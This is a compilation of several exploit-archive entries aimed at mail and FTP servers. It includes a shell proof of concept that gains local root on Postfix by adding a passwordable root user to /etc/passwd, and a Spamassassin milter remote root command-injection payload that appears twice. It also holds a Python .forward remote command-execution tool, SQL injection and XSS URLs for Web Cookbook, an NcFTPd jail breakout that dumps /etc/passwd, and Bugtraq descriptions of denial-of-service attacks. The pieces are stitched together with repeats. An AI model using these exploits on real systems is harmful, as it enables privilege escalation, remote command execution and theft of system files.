	closedir(fd_dir);

	if (found == 0) {
		printf("[!] Are you sure that your postfix is vulnerable?\n");
		printf("[!] Are you launching me throw a .forward file?\n");
		exit(0);
	}

	printf("[*] Starting to flood the system!\n");
	fflush(stdout);
	/* detach from the delivering process' stdio before looping forever */
	close(0);
	close(1);
	close(2);

	// This triggers the events
	while (1) {
		write(fds[1], "A",1);
		read(fds[0],&c, 1);
	}
	return 0;
}
// milw0rm.com [2008-09-16]
Roman Medina-Heigl Hernandez aka RoMaNSoFt/rs_pocfix.txt ( na)
#!/bin/sh
#
# "rs_pocfix.sh" (PoC for Postfix local root vulnerability: CVE-2008-2936)
# by Roman Medina-Heigl Hernandez a.k.a. RoMaNSoFt <roman@rs-labs.com>
#
# Tested: Ubuntu / Debian
#
# [ Madrid, 30.Aug.2008 ]
#
# Config
# Operator-tunable settings; every path is probed in step 1 before anything
# is changed in step 2.
writable_dir=/tmp                                   # scratch dir for the link probe and the target backup
spool_dir=/var/mail                                 # Use "postconf mail_spool_directory" to obtain this
user=root                                           # mailbox name replaced by a hardlink in step 2
target=/etc/passwd                                  # file the link chain finally resolves to
useful_link=/usr/bin/atq                            # lrwxrwxrwx 2 root root 2 2007-05-04 22:15 /usr/bin/atq -> at
useful_link_dst=at                                  # Tip: find / -type l -uid 0 -print -exec ls -l {} \; | less
seconds=3                                           # wait after sendmail before comparing $target
user_in_passwd="dsr:3GsXLdEaKaGnM:0:0:root:/root:/bin/sh" # Pass is "dsrrocks"
postfix=`which postfix`                             # /usr/sbin/postfix  (empty when not installed)
postconf=/usr/sbin/postconf
postmap=/usr/sbin/postmap
# Funcs
# Print a status line on stdout and stop the script.
#   $1 - message text
quit() { echo "$1"; exit; }
# Step 1: is my system vulnerable?
# Show this script's own header (lines 2-9: title, author, tested platforms).
head -n 9 $0 | tail -n 8

# $postfix is unquoted, so an empty `which` result makes the test false.
if [ $postfix ] ; then
	echo "[*] Postfix seems to be installed"
else
	quit "[!] Are you sure Postfix is installed?"
fi

# Probe: create a symlink (dst1 -> src), then hardlink it (dst2). If dst2 is
# itself still a symlink (-L), the hardlink was made to the symlink rather
# than to src -- the precondition the rest of the script relies on.
mkdir -p $writable_dir/pocfix
touch $writable_dir/pocfix/src
ln -s $writable_dir/pocfix/src $writable_dir/pocfix/dst1
ln $writable_dir/pocfix/dst1 $writable_dir/pocfix/dst2
if [ -L $writable_dir/pocfix/dst2 ] ; then
	echo "[*] Hardlink to symlink not dereferenced"
	rm -rf $writable_dir/pocfix
else
	rm -rf $writable_dir/pocfix
	quit "[!] Hardlink to symlink correctly dereferenced. System is not vulnerable"
fi

# Step 2 creates entries directly in the spool, so it must be writable.
if [ -d $spool_dir -a -w $spool_dir ] ; then
	echo "[*] Spool dir is writable"
else
	quit "[!] Spool dir is not writable"
fi

# Free both names the links will take. NOTE(review): an existing real
# mailbox for $user (root) is deleted here and never restored.
if [ -e $spool_dir/$user ] ; then
	rm -f $spool_dir/$user
	echo "[*] Mailbox for \"$user\" found. Trying to delete it"
	if [ -e $spool_dir/$user ] ; then
		quit "[!] Couldn't delete it"
	else
		echo "[*] Deletion ok"
	fi
fi
if [ -e $spool_dir/$useful_link_dst ] ; then
	rm -f $spool_dir/$useful_link_dst
	echo "[*] Mailbox for \"$useful_link_dst\" found. Trying to delete it"
	if [ -e $spool_dir/$useful_link_dst ] ; then
		quit "[!] Couldn't delete it"
	else
		echo "[*] Deletion ok"
	fi
fi

# Abort when an alias for $user exists in alias_database (checked only when
# that database is also listed in alias_maps); presumably delivery would then
# be redirected away from the spool mailbox.
aliases=`$postconf alias_database | cut -d"=" -f2`
$postconf alias_maps | grep -q $aliases
if [ $? -eq 0 ] ; then
	if [ $aliases ] ; then
		$postmap -q $user $aliases > /dev/null
		if [ $? -eq 0 ] ; then
			quit "[!] Mail alias for \"$user\" exists"
		fi
	fi
fi

# A non-empty mailbox_command means an external LDA does the delivery.
lda=`$postconf mailbox_command | cut -d"=" -f2`
if [ $lda ] ; then
	quit "[!] Non-Postfix LDA detected"
fi

# home_mailbox ending in "/" means Maildir delivery, not the spool file.
$postconf home_mailbox | grep -q '/$'
if [ $? -eq 0 ] ; then
	quit "[!] Maildir-style mailbox detected"
fi
# Step 2: Exploiting
# Hardlink the root-owned symlink $useful_link (atq -> at) under $user's
# mailbox name. The link keeps root ownership, and its relative target "at"
# now resolves inside $spool_dir. ln needs both paths on one filesystem.
ln -f $useful_link $spool_dir/$user 2> /dev/null || quit "[!] Couldn't create hardlink (different partitions?)"
# Complete the chain: $spool_dir/$user -> at -> $target.
ln -s -f $target $spool_dir/$useful_link_dst 2> /dev/null || quit "[!] Couldn't create symlink pointing to target file"
# Copy of $target for the before/after comparison. NOTE(review): the backup is
# neither restored nor removed by this script.
cp -f $target $writable_dir/pocfix_target_backup.$$ && echo "[*] Backed up: $target (saved as \"$writable_dir/pocfix_target_backup.$$\")"
# Deliver one line to $user. Whether the delivery agent follows the chain is
# what CVE-2008-2936 is about; the script only observes the outcome via diff.
echo "[*] Sending mail ($seconds seconds wait)"
echo $user_in_passwd | /usr/sbin/sendmail $user
sleep $seconds
# Unchanged $target => the delivery did not reach it.
diff -q $target $writable_dir/pocfix_target_backup.$$ > /dev/null
if [ $? -eq 0 ] ; then
	echo "[!] Exploit failed"
else
	echo "[*] Exploit successful (appended data to $target). Now \"su dsr\", pass is \"dsrrocks\")"
fi
# Remove the two links; any line appended to $target is left in place.
rm -f $spool_dir/$user
rm -f $spool_dir/$useful_link_dst
Proof of concept exploit for the local root vulnerability in Postfix. Original discovery by Sebastian Krahmer.
Kingcope/Apache Spamassassin Milter Plugin Remote Root Command Execution ( multiple)
Description: The Spamassassin Milter plugin suffers from a remote root command execution vulnerability. Full exploit details provided.
Author: Kingcope
Spamassassin Milter Plugin Remote Root Zeroday (BTW zerodays lurk in the
shadows not HERE)
aka the postfix_joker advisory
Logic fuckup?
March 07 2010 // if you read this 10 years later you are definitely
seeking the nice 0days!
Greetz fly out to alex,andi,adize :D
+++ KEEP IT ULTRA PRIV8 +++
Software
+-+-+-+-+
Apache Spamassassin
SpamAssassin is a mail filter which attempts to identify spam using
a variety of mechanisms including text analysis, Bayesian filtering,
DNS blocklists, and collaborative filtering databases.
SpamAssassin is a project of the Apache Software Foundation (ASF).
Postfix
What is Postfix? It is Wietse Venema's mailer that started life at IBM
research as an alternative to the widely-used Sendmail program.
Postfix attempts to be fast, easy to administer, and secure.
The outside has a definite Sendmail-ish flavor, but the inside is
completely different.
Spamassassin Milter
A little plugin for the Sendmail Milter (Mail Filter) library
that pipes all incoming mail (including things received by rmail/UUCP)
through the SpamAssassin, a highly customizable SpamFilter.
Remote Code Execution Vulnerability
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
The Spamassassin Milter Plugin can be tricked into executing any command
as the root user remotely.
If spamass-milter is run with the expand flag (-x option) it runs a
popen() including the attacker supplied
recipient (RCPT TO).
From spamass-milter-0.3.1 (-latest) Line 820:
//
// Gets called once for each recipient
//
// stores the first recipient in the spamassassin object and
// stores all addresses and the number thereof (some redundancy)
//
sfsistat
mlfi_envrcpt(SMFICTX* ctx, char** envrcpt)
{
struct context *sctx = (struct context*)smfi_getpriv(ctx);
SpamAssassin* assassin = sctx->assassin;
FILE *p;
#if defined(__FreeBSD__)
int rv;
#endif
debug(D_FUNC, "mlfi_envrcpt: enter");
if (flag_expand)
{
/* open a pipe to sendmail so we can do address
expansion */
char buf[1024];
char *fmt="%s -bv \"%s\" 2>&1";
#if defined(HAVE_SNPRINTF)
snprintf(buf, sizeof(buf)-1, fmt, SENDMAIL, envrcpt[0]);
#else
/* XXX possible buffer overflow here // is this a
joke ?! */
sprintf(buf, fmt, SENDMAIL, envrcpt[0]);
#endif
debug(D_RCPT, "calling %s", buf);
#if defined(__FreeBSD__) /* popen bug - see PR bin/50770 */
rv = pthread_mutex_lock(&popen_mutex);
if (rv)
{
debug(D_ALWAYS, "Could not lock popen mutex: %
s", strerror(rv));
abort();
}
#endif
p = popen(buf, "r"); [1]
if (!p)
{
debug(D_RCPT, "popen failed(%s). Will not
expand aliases", strerror(errno));
assassin->expandedrcpt.push_back(envrcpt[0]);
[1] the vulnerable popen() call.
Remote Root Exploit PoC through postfix
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
$ nc localhost 25
220 ownthabox ESMTP Postfix (Ubuntu)
mail from: me@me.com
250 2.1.0 Ok
rcpt to: root+:"|touch /tmp/foo"
250 2.1.5 Ok
$ ls -la /tmp/foo
-rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo
Signed,
Kingcope
Kingcope/Spamassassin Milter Plugin Remote Root ( na)
Spamassassin Milter Plugin Remote Root Zeroday (BTW zerodays lurk in the
shadows not HERE)
aka the postfix_joker advisory
Logic fuckup?
March 07 2010 // if you read this 10 years later you are definitely
seeking the nice 0days!
Greetz fly out to alex,andi,adize :D
+++ KEEP IT ULTRA PRIV8 +++
Software
+-+-+-+-+
Apache Spamassassin
SpamAssassin is a mail filter which attempts to identify spam using
a variety of mechanisms including text analysis, Bayesian filtering,
DNS blocklists, and collaborative filtering databases.
SpamAssassin is a project of the Apache Software Foundation (ASF).
Postfix
What is Postfix? It is Wietse Venema's mailer that started life at IBM
research as an alternative to the widely-used Sendmail program.
Postfix attempts to be fast, easy to administer, and secure.
The outside has a definite Sendmail-ish flavor, but the inside is
completely different.
Spamassassin Milter
A little plugin for the Sendmail Milter (Mail Filter) library
that pipes all incoming mail (including things received by rmail/UUCP)
through the SpamAssassin, a highly customizable SpamFilter.
Remote Code Execution Vulnerability
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
The Spamassassin Milter Plugin can be tricked into executing any command
as the root user remotely.
If spamass-milter is run with the expand flag (-x option) it runs a
popen() including the attacker supplied
recipient (RCPT TO).
From spamass-milter-0.3.1 (-latest) Line 820:
//
// Gets called once for each recipient
//
// stores the first recipient in the spamassassin object and
// stores all addresses and the number thereof (some redundancy)
//
sfsistat
mlfi_envrcpt(SMFICTX* ctx, char** envrcpt)
{
struct context *sctx = (struct context*)smfi_getpriv(ctx);
SpamAssassin* assassin = sctx->assassin;
FILE *p;
#if defined(__FreeBSD__)
int rv;
#endif
debug(D_FUNC, "mlfi_envrcpt: enter");
if (flag_expand)
{
/* open a pipe to sendmail so we can do address
expansion */
char buf[1024];
char *fmt="%s -bv \"%s\" 2>&1";
#if defined(HAVE_SNPRINTF)
snprintf(buf, sizeof(buf)-1, fmt, SENDMAIL, envrcpt[0]);
#else
/* XXX possible buffer overflow here // is this a
joke ?! */
sprintf(buf, fmt, SENDMAIL, envrcpt[0]);
#endif
debug(D_RCPT, "calling %s", buf);
#if defined(__FreeBSD__) /* popen bug - see PR bin/50770 */
rv = pthread_mutex_lock(&popen_mutex);
if (rv)
{
debug(D_ALWAYS, "Could not lock popen mutex: %
s", strerror(rv));
abort();
}
#endif
p = popen(buf, "r"); [1]
if (!p)
{
debug(D_RCPT, "popen failed(%s). Will not
expand aliases", strerror(errno));
assassin->expandedrcpt.push_back(envrcpt[0]);
[1] the vulnerable popen() call.
Remote Root Exploit PoC through postfix
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
$ nc localhost 25
220 ownthabox ESMTP Postfix (Ubuntu)
mail from: me@me.com
250 2.1.0 Ok
rcpt to: root+:"|touch /tmp/foo"
250 2.1.5 Ok
$ ls -la /tmp/foo
-rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo
Signed,
Kingcope
The Spamassassin Milter plugin suffers from a remote root command execution vulnerability. Full exploit details provided.
Kingcope/skyline.py.txt ( na)
#!python
# (C) 2007 kcope production
from ftplib import FTP
import sys
import socket
# Python 2 script (print-statement syntax). Banner, then exactly three
# positional arguments are required: target host, FTP user name, FTP password.
print "Sendmail/Postfix FORWARD Remote Exploit"
print "kcope/2007 - hey alex,andi"

if (len(sys.argv) != 4):
    print "usage: skyline.py <hostname> <ftp username> <ftp password>"
    sys.exit()

# Module-level globals read by FTPconnect() below.
hostname = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]

print "[+] INITIAL FTP STOR"
def FTPconnect(initial):
    # Upload the local ".forward" file to the FTP account (hostname, username
    # and password are module globals). When `initial` is true the file is
    # first (re)written with the single pipe line "|touch /tmp/XXX"; otherwise
    # whatever the caller already wrote to ".forward" is sent as is. Any error
    # (bare except) prints a message and terminates the process.
    # NOTE(review): the STOR path is relative to the FTP login directory --
    # presumably the user's home, where the MTA looks for .forward; confirm.
    try:
        ftp = FTP(hostname)
        print ftp.getwelcome()
        ftp.login(username, password)
        if (initial):
            f = open(".forward", "wb")
            f.write("|touch /tmp/XXX\n")
            f.close()
        f = open(".forward", "rb")
        ftp.storbinary("STOR .forward", f)
        ftp.quit()
        f.close()
    except:
        print "[-] FTP Error. Correct Login Credentials ?"
        sys.exit()
FTPconnect(True)

print "[+] PLEASE ENTER COMMANDS TO EXECUTE"
print "[+] sendmail allows a single command"
print "[+] postfix allows many"
print "[+] END WITH . IN A SINGLE LINE"

# Read commands from stdin until a lone "." and write them to the local
# ".forward": the first as '|"<cmd>> ~/RESULTS"', each further one as
# '|"<cmd>>> ~/RESULTS"'. (`input` shadows the builtin; writelines() on a str
# iterates its characters, which writes the same bytes as write().)
input = sys.stdin.readline().strip()
f = open(".forward", "wb")
f.writelines("|" + "\"" + input + "> ~/RESULTS" + "\"" + "\n")
while (True):
    input = sys.stdin.readline().strip()
    if (input == "."): break
    f.writelines("|" + "\"" + input + ">> ~/RESULTS" + "\"" + "\n")
f.close()

print "[+] FTP STOR"
FTPconnect(False)

print "[+] EXPLOITING BOX"
# First connection: read only the SMTP banner and take the host name from it
# (the text after "220 " up to the next space).
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((hostname, 25))
    smtpline = s.recv(1024)
    smtphostname = smtpline[4:smtpline.find(" ", 5)]
    s.close()
except:
    print "[-] EXPLOTATION Error. Is sendmail/postfix running ?"
    sys.exit()

# Second connection: one empty message from <username>@<smtphostname> to the
# same address, so that local delivery (and presumably .forward processing)
# happens on the target.
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((hostname, 25))
    smtpline = s.recv(1024)
    print smtpline
    s.send("HELO eyecandy\r\n")
    s.recv(1024)
    s.send("MAIL FROM: " + username + "@" + smtphostname + "\r\n")
    s.recv(1024)
    s.send("RCPT TO: " + username + "@" + smtphostname + "\r\n")
    s.recv(1024)
    s.send("DATA" + "\r\n")
    s.recv(1024)
    s.send("." + "\r\n")
    s.recv(1024)
    s.send("quit" + "\r\n")
    s.recv(1024)
    s.close()
except:
    print "[-] EXPLOTATION Error. Is sendmail/postfix running ?"
    sys.exit()

print "[+] RETRIEVING RESULTS"
# retrlines() with no callback prints the received lines to stdout; nothing
# here saves them to a local file. The remote copy is then deleted.
try:
    ftp = FTP(hostname)
    print ftp.getwelcome()
    ftp.login(username, password)
    ftp.retrlines("RETR RESULTS")
    ftp.delete("RESULTS")
except:
    print "[-] FTP RETRIEVE Error. Correct Login Credentials ? Sendmail / postfix accepting messages ?"
    sys.exit()

# NOTE(review): no local RESULTS file was written above, so this open() raises
# IOError unless one already exists in the working directory. The final
# f.close() re-closes the ".forward" handle closed earlier (harmless).
for line in open("RESULTS"):
    print line
f.close()
Sendmail/Postfix FORWARD remote exploit that leverages ftpd.
Saadat Ullah/Web Cookbook SQL Injection ( na)
# Exploit Title: Web Cookbook Multiple SQL Injection
# Date: 2013/3/12
# Exploit Author: Saadat Ullah , saadi_linux@rocketmail.com
# Software Link: http://sourceforge.net/projects/webcookbook/
# Author HomePage: http://security-geeks.blogspot.com/
# Tested on: Server: Apache/2.2.15 (Centos) PHP/5.3.3
# SQL Injection
http://localhost/cook/searchrecipe.php?sstring=[SQLi]
http://localhost/cook/showtext.php?mode=[SQLi]
http://localhost/cook/searchrecipe.php?mode=1&title=[SQLi]&prefix=&preparation=&postfix=&tipp=&ingredient=
http://localhost/cook/showtext.php?mode=[SQLi]
#Proof Of Concept
In showtext.php
Code:
$mode = $_GET["mode"];
.
.
showText($mode, $art);//sending $mode to a function without sanitizing it
.
.
function showText($kategorie, $art) {
initDB();
echo "<div class=\"rdisplay\">\n";
$query = "SELECT * FROM dat_texte WHERE id = $kategorie"; //using a non sanitize field in the querry
$result = mysql_query($query);
.
.
All GET fields are vulnerable to SQL injection:
http://localhost/cook/searchrecipe.php?mode=1&title=[SQLi]&prefix=&preparation=&postfix=&tipp=&ingredient=
#p0c
In searchrecipe.php
$title = $_GET['title'];
$prefix = $_GET['prefix'];
$preparation = $_GET['preparation'];
$postfix = $_GET['postfix'];
$tipp = $_GET['tipp'];
$ingredient = $_GET['ingredient'];
.
.
.
if ($title != "") {
$sstring = "a.title LIKE '%$title%' ";
}
.
.
searchRecipe($mode, $sstring);
.
.
In Function SearchRecipe
$query = "SELECT DISTINCT a.id, a.title FROM das_rezept a, dat_ingredient b WHERE a.title LIKE '%$sstring%' OR b.description LIKE '%$sstring%' AND a.id = b.recipe ORDER BY a.title";
http://localhost/cook/searchrecipe.php?sstring=[SQLi]
P0c
$sstring = $_GET['sstring'];
if ($sstring != "") {
searchRecipe(0, $sstring);
.
.
.
$query = "SELECT DISTINCT a.id, a.title FROM das_rezept a, dat_ingredient b WHERE a.title LIKE '%$sstring%' OR b.description LIKE '%$sstring%' AND a.id = b.recipe ORDER BY a.title";
A simple non-persistent (reflected) XSS:
http://localhost/cook/searchrecipe.php?mode=1&title=<script>alert('hi');</script>&prefix=&preparation=&postfix=&tipp=&ingredient=
#Independent Pakistani Security Researcher
Web Cookbook suffers from multiple remote SQL injection vulnerabilities.
/qmail-DoS.txt ( na)
Date: Mon, 4 Jan 1999 00:04:09 -0500
From: Wietse Venema <wietse@PORCUPINE.ORG>
To: BUGTRAQ@netspace.org
Subject: Anonymous Qmail Denial of Service
In recent postings, Daniel Bernstein expands on the insecurity of
the Postfix world-writable directory for local mail submission.
Of all the attacks possible with such a scheme, one attack would
result in mail not being delivered. That is of course unacceptable.
After my request for input from the Bugtraq membership I received
much useful feedback. Many suggestions were made for implementing
a private rendez-vous between unrelated, untrusting processes. I
will try to write up a summary of the responses.
I am grateful for all suggestions for improvements that were made,
in particular for one suggestion made by Daniel Bernstein himself,
in this same forum:
Why doesn't [Postfix] use a protected queue, and a setuid
program to add mail to the queue with guaranteed user
identification?
Postfix uses a set-gid program and a mode 0770 submission directory,
and it does so for a very good reason. Why doesn't Postfix use a
set-uid program, as suggested? The reason is that, contrary to Daniel
Bernstein's claim, a set-uid posting program cannot guarantee user
identification. I will illustrate this misconception with an example.
qmail uses a set-uid posting program, called qmail-queue. When
this program is invoked, it opens a queue file somewhere below
/var/qmail/queue. For example:
-rw-r--r-- 1 qmailq qmail 0 Dec 31 17:02 queue/mess/21/674956
What happens when the qmail-queue process is signaled with, say,
SIGKILL? The file will stay in the queue. That's a zero-length
file, owned by qmail, without any user identification whatsoever.
Each time a user does something like:
% /var/qmail/bin/qmail-queue
^Z
Suspended
% kill -9 %1
[1] Killed /var/qmail/bin/qmail-queue
%
There will be one more zero-length file, owned by qmail, without
any user identification whatsoever. It is an exercise for the
reader to write a small program that automates the process:
fork a child
child: execute /var/qmail/bin/qmail-queue
parent: wait briefly and SIGKILL the child
When this sequence is executed a sufficient number of times, the
queue file system runs out of available resources. No-one can send
mail. No-one can receive mail. And no-one can be held responsible.
I fully agree with Daniel Bernstein that every mail system, be it
Postfix or qmail or anything else, should be able to add mail to
the queue with guaranteed user identification. I am grateful to him
for reminding me of this very important and very desirable property.
The lack of user identification as described above was verified on
BSD/OS 2.1, BSD/OS 3.1, and FreeBSD 2.1.1. It is reasonable to
expect that the same behavior exists on other BSD systems/versions.
When the same tests are run on Solaris 2.6, RedHat 5.0, and on
SunOS 4.1.3_U1, the only difference is in the queue file group
ownership attributes:
-rw-r--r-- 1 qmailq users 0 Dec 31 18:10 queue/mess/1/418325
What can be done about this lack of accountability? On non-BSD
systems, the hole can be worked around by placing every user in a
different group, so that a malicious user can be recognized by the
queue file group ownership. That will not close the hole on BSD
systems, however. For this reason, the preferable solution is to
close the hole by changing qmail. For this I suggest the use of a
set-gid posting program, similar to the one that is used in Postfix.
Wietse
-----------------------------------------------------------------------------
Date: Mon, 4 Jan 1999 10:39:13 -0500
From: Illuminatus Primus <vermont@GATE.NET>
To: BUGTRAQ@netspace.org
Subject: Re: Anonymous Qmail Denial of Service
On Mon, 4 Jan 1999, Wietse Venema wrote:
> What happens when the qmail-queue process is signaled with, say,
> SIGKILL? The file will stay in the queue. That's a zero-length
> file, owned by qmail, without any user identification whatsoever.
Signals are one of the many gateways between setid processes that
programmers can easily forget about. An easy remedy for the signal
problem is to log the real uid on startup and then set it to the effective
uid before doing anything important. This is probably what ping had to do
to fix the SIGALRM ping flood exploit.
In my opinion, though, the "preferable solution" is to not do setgid and
be happy that the ownership of the 0 byte files can be traced. As you've
said yourself, set[ug]id offers too many avenues for exploitation. The
supposed tightening of Postfix's security by using a setgid queue helper
seems unclean to me. Will Postfix's queue daemon behave correctly
when queue files can be dropped in half-written (SIGKILL to the setgid
queue helper while it's writing)? Will the queue daemon behave correctly
if a queue file is left locked indefinitely (SIGSTOP or SIGKILL, depending
on how the lock is made)? The only clear advantage you have over
Bernstein's method is that the first interaction with the queue atomically
logs the caller's uid.
I think it is far easier to implement secure enforcement of policy when
the privilege levels are more clearly separated than in setid. Sending
the data through sockets is one way to accomplish this. Check out userv:
http://www.chiark.greenend.org.uk/~ian/userv/
I'm sure implementing something similar that allows portable
authentication of uids wouldn't be that hard - I can think of several
schemes right now.
Anonymous Qmail Denial of Service - lack of guaranteed user identification can result in malicious DoS attack by unidentifiable local user in which queue file system runs out of available resources.
/qmail-DoS-anonymous.txt ( na)
Date: Tue, 5 Jan 1999 22:41:44 -0000
From: D. J. Bernstein <djb@CR.YP.TO>
To: BUGTRAQ@netspace.org
Subject: Re: Anonymous Qmail Denial of Service
News flash: There are dozens of denial-of-service attacks on every MTA.
Example: Any Internet user can create a continuing torrent of mail from
random Internet addresses to wietse@porcupine.org. A few basic methods:
* Send lots of messages to mailinglistmanager@whatever with a return
path and From line of wietse@porcupine.org. Automated responses
will go back to wietse@porcupine.org.
* Send lots of messages to legitimateuser@whatever with a return
path of wietse@porcupine.org. After the legitimateuser mailbox
fills up, messages will bounce to wietse@porcupine.org, in some
cases with a delay.
* Relay lots of messages through MTAs with spam-friendly defaults.
For example, postfix allows relaying from the local network. If a
postfix system is dialing into an ISP as (say) 18.25.0.221, and
you're dialing in as (say) 18.25.0.37, then you can queue messages
on that system for wietse@porcupine.org.
* Subscribe wietse@porcupine.org to an automated mailing list. The
majordomo 1.* cookie mechanism doesn't stop this attack; it isn't
cryptographically secure. (Several students in my cryptography
class two years ago were able to break it, under time pressure, as
an extra-credit problem on the midterm.)
Thousands of these attacks, producing millions of messages, can be
carried out in a matter of minutes. The porcupine.org (postfix) SMTP
server and mail queue will be flooded, making it practically impossible
for legitimate mail to get through. You can easily remain anonymous, for
example by abusing the student Internet terminals at MIT.
As another example, here's a denial-of-service attack on postfix:
Connect to the SMTP server at 127.0.0.1 and inject a mail message.
Repeat ad nauseam.
Most MTAs are able to log the user responsible (by contacting port 113
and dropping unidentified connections); postfix doesn't even try.
Okay, okay, I admit that this isn't news. Here's what I said in the
qmail documentation, starting with the first release three years ago:
There are lots of interesting remote denial-of-service attacks on any
mail system. A long-term solution is to insist on prepayment for
unauthorized resource use. The tricky technical problem is to make
the prepayment enforcement mechanism cheaper than the expected cost
of the attacks.
Denial-of-service attacks have always been excluded from the qmail
security guarantee (http://pobox.com/~djb/qmail/guarantee.html). They
are present in every MTA, widely documented, and very difficult to fix.
On the bright side, mailers are _not_ permitted to discard messages for
frivolous reasons such as full disks. They have to report the problem to
the sender, so that the sender can keep the message and try again later.
This isn't just common sense. It's also in RFC 1123, Host Requirements,
section 5.3.3, Reliable Mail Receipt:
When the receiver-SMTP accepts a piece of mail (by sending a "250 OK"
message in response to DATA), it is accepting responsibility for
delivering or relaying the message. It must take this responsibility
seriously, i.e., it MUST NOT lose the message for frivolous reasons,
e.g., because the host later crashes or because of a predictable
resource shortage.
I'm keeping a list of mail clients that do not handle failures properly;
see http://pobox.com/~djb/docs/maildisasters/queueloss.html. Please let
me know if you have any additions to the list.
This thread began when Venema claimed that it was impossible to track a
user who fills up qmail's queue by repeatedly running and killing
qmail-queue.
Venema's claim is false. Every inode created this way requires a new
qmail-queue process. The process is visible in the standard UNIX process
list while it is running, and with an X entry in the standard UNIX acct
mechanism after it has been killed; either way, the user is identified.
X entries are sometimes created by legitimate users, but not in the
volume that would be required to fill up the mail queue. Occasional Xs
are not sufficient to carry out this attack, since each inode is
automatically removed by qmail-clean after an appropriate delay.
Venema further claims that ``a set-uid posting program cannot guarantee
user identification.'' That claim is false. The user id is provided by
the standard UNIX getuid() system call.
See http://pobox.com/~djb/qmail/venema.html for comments on Venema's
previous denial-of-service accusations.
For the record, nothing here should be interpreted as advocating the
setuid/setgid concept. As I wrote in the qmail documentation in 1995:
A setuid program must operate in a very dangerous environment: a user
is under complete control of its fds, args, environ, cwd, tty, rlimits,
timers, signals, and more. Even worse, the list of controlled items
varies from one vendor's UNIX to the next, so it is very difficult to
write portable code that cleans up everything.
Of the six most recent sendmail security holes, three worked only
because the entire sendmail system is setuid.
But my conclusion was merely to be very, very careful: ``Do as little as
possible in setuid programs.'' The alternatives, such as world-writable
directories, are horrendous. We'll be stuck with setuid and setgid until
UNIX develops a simple, portable, reliable, secure IPC mechanism.
---Dan
A variety of anonymous Qmail Denial of Service attacks described.
Kingcope/NcFTPd <= 2.8.5 Remote Jail Breakout Vulnerability ( freebsd)
NcFTPd <= 2.8.5 remote jail breakout
Discovered by: Kingcope
Contact: kcope2<at>googlemail.com / http://isowarez.de
Date: 27th July 2009
Greetings: Alex,Andi,Adize,wY!,Netspy,Revoguard
Prerequisites: Valid user account.
Demonstration on FreeBSD 7.0-RELEASE and NcFTPd 2.8.5 (latest version):
# ftp 192.168.2.5
Connected to 192.168.2.5.
220 localhost NcFTPd Server (unregistered copy) ready.
Name (192.168.2.5:root): kcope
331 User kcope okay, need password.
Password:
230-You are user #1 of 50 simultaneous users allowed.
230-
230 Restricted user logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get /etc/passwd passwd
local: passwd remote: /etc/passwd
502 Unimplemented command.
227 Entering Passive Mode (192,168,2,5,219,171)
550 No such file.
ftp> ls ..
227 Entering Passive Mode (192,168,2,5,218,102)
553 Permission denied.
ftp> mkdir isowarez
257 "/isowarez" directory created.
ftp> quote site symlink /etc/passwd isowarez/.message
250 Symlinked.
ftp> cd isowarez
250-"/isowarez" is new cwd.
250- 250-# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $ 250-# 250-root:*:0:0:Charlie &:/root:/bin/sh 250-toor:*:0:0:Bourne-again Superuser:/root: 250-daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin 250-operator:*:2:5:System &:/:/usr/sbin/nologin 250-bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin 250-tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin 250-kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin 250-games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin 250-news:*:8:8:News Subsystem:/:/usr/sbin/nologin 250-man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin 250-sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin 250-smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin 250-mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin 250-bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin 250-proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin 250-_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin 250-_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin 250-uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico 250-pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin 250-www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin 250-nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin 250-kcope:*:1001:1001:User kcope:/home/kcope:/bin/csh 250-messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/sbin/nologin 250-polkit:*:562:562:PolicyKit Daemon User:/nonexistent:/sbin/nologin 250-haldaemon:*:560:560:HAL Daemon User:/nonexistent:/sbin/nologin 250-ftp:*:1002:14:User &:/home/ftp:/bin/sh 250-cyrus:*:60:60:the cyrus mail server:/usr/local/cyrus:/bin/csh 250-postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin 250-test:*:1003:1003:test:/home/test:/bin/sh 250-+testx:*:::::/bin/sh 250 ftp> +on freebsd you can symlink directories like ´/´ Cheerio, 
Kingcope # milw0rm.com [2009-07-27]
Kingcope/NcFTPD 2.8.5 Jail Breakout ( na)
NcFTPd <= 2.8.5 remote jail breakout
Discovered by: Kingcope
Contact: kcope2<at>googlemail.com / http://isowarez.de
Date: 27th July 2009
Greetings: Alex,Andi,Adize,wY!,Netspy,Revoguard
Prerequisites: Valid user account.
Demonstration on FreeBSD 7.0-RELEASE and NcFTPd 2.8.5 (latest version):
# ftp 192.168.2.5
Connected to 192.168.2.5.
220 localhost NcFTPd Server (unregistered copy) ready.
Name (192.168.2.5:root): kcope
331 User kcope okay, need password.
Password:
